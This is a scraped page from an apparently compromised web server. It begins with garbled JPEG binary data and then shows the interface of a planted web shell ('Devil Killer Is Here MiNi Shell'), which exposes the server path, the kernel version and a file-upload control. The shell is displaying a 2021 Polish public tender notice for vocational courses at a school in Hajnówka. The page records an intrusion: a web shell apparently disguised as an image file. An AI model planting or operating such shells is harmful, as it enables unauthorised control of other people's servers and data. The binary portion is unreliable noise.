JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211105/0025982201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie kursów prowadzących do nabycia przez uczniów Zespołu Szkół Zawodowych w Hajnówce kwalifikacji, kompetencji i umiejętności zawodowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Zawodowych w Hajnówce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000181881</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">3 Maja 25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Hajnówka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">17-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">85 682 2071</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zsz_hajnowka@op.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zszhajnowka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie kursów prowadzących do nabycia przez uczniów Zespołu Szkół Zawodowych w Hajnówce kwalifikacji, kompetencji i umiejętności zawodowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d03db46d-3e3b-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00259822</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> &#34;Podniesienie jakości kształcenia zawodowego w Hajnówce poprzez realizację Kompleksowego programu Rozwoju Szkoły – II edycja &#34; nr RPPD.03.03.01-20-0276/19 współfinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2014-2020, Oś Priorytetowa III. Działanie 3.3. Poddziałanie 3.3.1. Priorytet inwestycyjny 10.4. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Wykonawca składa ofertę za<br/>pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP<br/>i udostępnionego na miniPortalu. W formularzu oferty Wykonawca zobowiązany jest podać adres<br/>skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem. Adres<br/>strony internetowej prowadzonego postępowania: https://miniportal.uzp.gov.pl/ W postępowaniu o<br/>udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>miniPortalu pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej. W postępowaniu komunikacja pomiędzy<br/>Zamawiającym a Wykonawcami odbywa się elektronicznie za pośrednictwem dedykowanego<br/>formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal.<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>zsz_hajnowka.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę<br/>składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym. Wszystkie trzy możliwości są równorzędne. Oferta<br/>składana w formie elektronicznej musi zostać podpisana kwalifikowanym podpisem elektronicznym,<br/>natomiast oferta składana w postaci elektronicznej musi zostać podpisana podpisem zaufanym lub<br/>podpisem osobistym. Sposób sporządzenia dokumentów elektronicznych musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z<br/>2020 poz. 2415).Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z obwieszczeniem Prezesa Rady Ministrów z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego<br/>tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych<br/>wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych. Zamawiający rekomenduje wykorzystanie formatów: .pdf<br/>.doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji danych<br/>Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip albo .7Z. Jeśli Wykonawca pakuje<br/>dokumenty np. w plik ZIP, Zamawiający zaleca wcześniejsze podpisanie każdego ze<br/>skompresowanych plików. Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą<br/>weryfikację podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających<br/>się na ofertę na format .pdf i opatrzenie ich podpisem w formacie PAdES. Pliki w innych formatach niż<br/>PDF zaleca się opatrzyć zewnętrznym podpisem XadES – Wykonawca powinien wówczas pamiętać,<br/>aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym. W postępowaniu o udzielenie<br/>zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie<br/>oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za<br/>pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem<br/>Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania).<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>zsz_hajnowka@op.pl</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia RODO,<br/>Zamawiający informuje, że: a) administratorem Pani/Pana danych osobowych jest Zespół Szkół<br/>Zawodowych w Hajnówce, 17-200 Hajnówka, ul. 3 Maja 25, e-mail zsz_hajnowka@op.pl, tel. 85 682 20<br/>71 ;b) inspektorem ochrony danych osobowych jest Tomasz Baj, tel. 500 187 013, e-mail:<br/>admin@bialorushajnowka.pl ;c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust.<br/>1 lit. c rozporządzenia RODO w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego na przeprowadzenie kursów prowadzących do nabycia przez uczniów Zespołu Szkół<br/>Zawodowych w Hajnówce kwalifikacji, kompetencji i umiejętności zawodowych, znak sprawy:<br/>01/RPOWP/2021 prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji; d) odbiorcami<br/>Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 74 ustawy Pzp; e) Pani/Pana dane osobowe będą przechowywane<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;f) obowiązek<br/>podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp; g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 rozporządzenia RODO;h) posiada Pani/Pan:− na podstawie<br/>art. 15 rozporządzenia RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;− − prawo<br/>do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy rozporządzenia RODO;i)<br/>nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e rozporządzenia RODO prawo do<br/>usunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>rozporządzenia RODO;− na podstawie art. 21 rozporządzenia RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c rozporządzenia RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie z prawa do sprostowania danych osobowych określonego w art. 16 rozporządzenia RODO nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą<br/>Pzp. Skorzystanie z prawa żądania od administratora ograniczenia przetwarzania danych osobowych<br/>na podstawie art. 18 ust. 1 rozporządzenia RODO nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego na przeprowadzenie kursów<br/>prowadzących do nabycia przez uczniów Zespołu Szkół Zawodowych w Hajnówce kwalifikacji,<br/>kompetencji i umiejętności zawodowych , znak sprawy: 2/RPOWP/2021</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/RPOWP/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kursy podnoszące kompetencje i umiejętności zawodowe „Tachospeed i moduł kontrolny z<br/>rozliczeniem pracy kierowców” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis sposobu obliczania kryteriów oceny ofert:a) Kryterium (C) – ocena<br/>na podstawie formularza ofertowego według następujących zasad:C = (najniższa zaoferowana cena<br/>brutto spośród badanych ofert / cena badanej oferty brutto) x 100 pkt x 60%Maksymalna liczba<br/>punktów, jakie oferta może uzyskać po uwzględnieniu wagi w tym kryterium wynosi 60 pkt. b) Kryterium<br/>(D) – doświadczenie osoby/osób wyznaczonej/-ych do realizacji zamówienia – ocena na podstawie<br/>formularza ofertowego:Kryterium rozpatrywane będzie na podstawie doświadczenia osoby<br/>wyznaczonej do realizacji zamówienia wskazanej w formularzu ofertowym w okresie ostatnich trzech<br/>lat przed upływem terminu składania ofert w przeprowadzeniu szkoleń o tematyce zgodnej z tematyką<br/>szkolenia/ramowym programem szkolenia w zakresie danej części zamówienia.• 2 szkolenia – 0% (0<br/>pkt)• 3 – 5 szkoleń – 5% (5 pkt)• 6 i więcej szkoleń – 10% (10 pkt)Maksymalna liczba punktów, jakie<br/>oferta może uzyskać po uwzględnieniu wagi w tym kryterium wynosi 10 pkt. c) Kryterium (W) – poziom<br/>wykształcenia osoby/osób wyznaczonej/-ych do realizacji zamówienia:• wykształcenie średnie<br/>kierunkowe zgodnie z prowadzonym zakresem szkolenia – 5% (5 pkt) • wykształcenie wyższe<br/>kierunkowe zgodnie z prowadzonym zakresem szkolenia – 10% (10 pkt)Maksymalna liczba punktów,<br/>jakie oferta może uzyskać po uwzględnieniu wagi w tym kryterium wynosi 10 pkt. d) Kryterium (U) –<br/>uprawnienia do prowadzenia zajęć z młodzieżą – przygotowanie pedagogiczne zgodnie z<br/>rozporządzeniem Ministra Edukacji Narodowej z dnia 1 sierpnia 2017 r. w sprawie szczegółowych<br/>kwalifikacji wymaganych od nauczycieli (t. jedn. Dz. U. 2020 poz. 1289):• brak uprawnień<br/>pedagogicznych – 0% (0 pkt)• uprawnienia pedagogiczne do pracy z młodzieżą – 10% (10<br/>pkt)Maksymalna liczba punktów, jakie oferta może uzyskać po uwzględnieniu wagi w tym kryterium<br/>wynosi 10 pkt. e) Kryterium (Cr) – posiadanie przez jednostkę/instytucję szkoleniową certyfikatu<br/>systemu jakości w działalności edukacyjnej zgodny z normą PN-EN ISO 9001 lub certyfikatu systemu<br/>zarządzania jakością IQNet lub akredytacji kształcenia ustawicznego w formach pozaszkolnych<br/>wydanej przez Kuratorium Oświaty lub równoważnych:• jednostka szkoleniowa / instytucja szkoleniowa<br/>posiada certyfikat, akredytację – TAK – 10% (10 pkt)• jednostka szkoleniowa / instytucja szkoleniowa<br/>nie posiada certyfikatu, akredytacji – NIE – 0% (0 pkt)Maksymalna liczba punktów, jakie oferta może<br/>uzyskać po uwzględnieniu wagi w tym kryterium wynosi 10 pkt. Za ofertę najkorzystniejszą uznana<br/>zostanie oferta, której zostanie przyznana najwyższa ilość punktów spośród ofert ważnych,<br/>niepodlegających odrzuceniu, stanowiąca sumę punktów przyznanych w kryteriach oceny ofert<br/>C+D+W+U+Cr.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby/osób wyznaczonej/-ych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Poziom wykształcenia osoby/osób wyznaczonej/-ych do realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Uprawnienia do prowadzenia zajęć z młodzieżą – przygotowanie pedagogiczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Posiadanie przez jednostkę/instytucję szkoleniową certyfikatów jakości usług lub akredytacji prowadzonej działalności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie mogą ubiegać się Wykonawcy, którzy:a) posiadają uprawnienia do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, tj. posiadają aktualny wpis do ewidencji<br/>placówek prowadzonej przez jednostkę samorządu terytorialnego obowiązaną do prowadzenia<br/>odpowiedniego typu placówek zgodnie z art. 168 ustawy z dnia 14 grudnia 2016 r. Prawo<br/>oświatowe (t. jedn. Dz. U. 2020 poz. 910 ze zm.); b) posiadają doświadczenie, tj. wykonali w<br/>okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, przynajmniej dwa zamówienia na przeprowadzenie<br/>szkolenia o tematyce zgodnej z tematyką szkolenia/ramowym programem szkolenia dotyczącym<br/>części zamówienia, w zakresie której jest składana oferta; c) dysponują osobami zdolnymi do<br/>wykonania zamówienia, tj. minimum jedną osobą, która w ostatnich 3 lat przed upływem terminu<br/>składania ofert przeprowadziła minimum 2 szkolenia o tematyce zgodnej z tematyką<br/>szkolenia/ramowym programem szkolenia dotyczącym części zamówienia, w zakresie której jest<br/>składana oferta. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) aktualny wpis do ewidencji placówek prowadzonej przez jednostkę<br/>samorządu terytorialnego obowiązaną do prowadzenia odpowiedniego typu placówek zgodnie z art.<br/>168 ustawy z dnia 14 grudnia 2016 r. Prawo oświatowe (t. jedn. Dz. U. 2020 poz. 910 ze zm.);b) wykaz<br/>wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, zamówień spełniających warunki określone w<br/>rozdziale IV pkt 1.1 SWZ, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na<br/>rzecz których usługi zostały wykonane [wg załącznika nr 4 do SWZ];c) referencje bądź inne dokumenty<br/>wystawione przez podmiot, na rzecz którego usługi ujęte w wykazie wykonanych zamówień były<br/>wykonywane, określające, czy zamówienia te zostały wykonane lub są wykonywane należycie<br/>(oświadczenie Wykonawcy, jeżeli z przyczyn niezależnych od siebie nie jest w stanie uzyskać tych<br/>dokumentów);d) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia, w<br/>szczególności odpowiedzialnych za świadczenie usług lub kontrolę jakości, wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami [wg załącznika nr 5 do SWZ];e) zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami 